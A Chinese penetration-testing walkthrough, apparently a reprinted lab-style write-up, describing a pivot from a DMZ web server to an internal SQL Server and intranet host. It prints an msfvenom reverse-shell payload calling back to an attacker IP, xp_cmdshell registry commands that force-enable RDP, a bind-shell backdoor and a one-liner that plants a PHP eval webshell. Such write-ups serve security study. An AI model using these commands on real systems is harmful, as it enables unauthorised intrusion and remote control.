DMZ Web
Information Gathering
这个前台面板看了下可以登陆ftp、mssql、mysql,简单的先尝试了几个弱口令无果。
并且穷举了子域名
拿到了webshell考虑弹一个msf meterpreter shell回来。
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.187 lport=2678 -f exe > ./bd.exe
SQL Server
Privilege Escalation
看到还有一个网卡,是有内网的,加个用户开3389上去看一下
看到确实有三个网站在运行,有一个是.net的,但是本机没有sql server,考虑是不是站库分离的情况。
因此确定ww2.target.com是站库分离的情况,并且直接是sa权限。直接aspx马连一家伙
添加一下xp_cmdshell执行命令
136应该是sql sever ip,先xp_cmdshell强开一波3389
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 3389 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f
net start termservice
Socks Proxifier
这里选择用ew来做代理。
看到确实开了,但是proxchains连接不上,估计是防火墙或者其他原因。这里其实还可以选择用msf进行后渗透,我是关掉了DMZ的防火墙。
这里注意,如果ew比较麻烦,不太好上传,那我们可以在msf添加了路由之后,使用auxiliary/server/socks4a这个模块,用msf开个socks代理,这样本机可以通过msf的路由来访问内网,proxychains配置就写本机ip即可。
但还是要用msf添加一下路由
接着我用msfvenom生成bind_tcp的后门,本机Windows通过proxifier(或SocksCap64)连到DMZ的8888端口进而连接SQL Server的3389并开启文件共享,然后执行后门
msfvenom -p windows/meterpreter/bind_tcp lport=2999 -f exe > ./bd_1.exe
而此时因为msf已经添加路由,可以通过路由去主动连SQL Server服务器获取shell
成功获取shell。
再添加一层路由,看一下10.10.1.0/24这个段有什么。
Intranet Web
Information Gathering
看到一台129,我也不做探测了,看起来就那么一两台,如果要探测内网的话可以proxychains配合nmap或者msf添加路由后本身就可以完成。同样的,用ew做了层代理。
我选择了msf直接探测端口…比较方便,但是后面涉及到了web,所以考虑了一下还是做了ew。
python .\phpstudy.py "echo ^<?php @eval($_POST[shell]); ?^>>c:\phpstudy\WWW\get.php"
文章来源:潇湘信安
黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!
如侵权请私聊我们删文
END
多一个点在看多一条小鱼干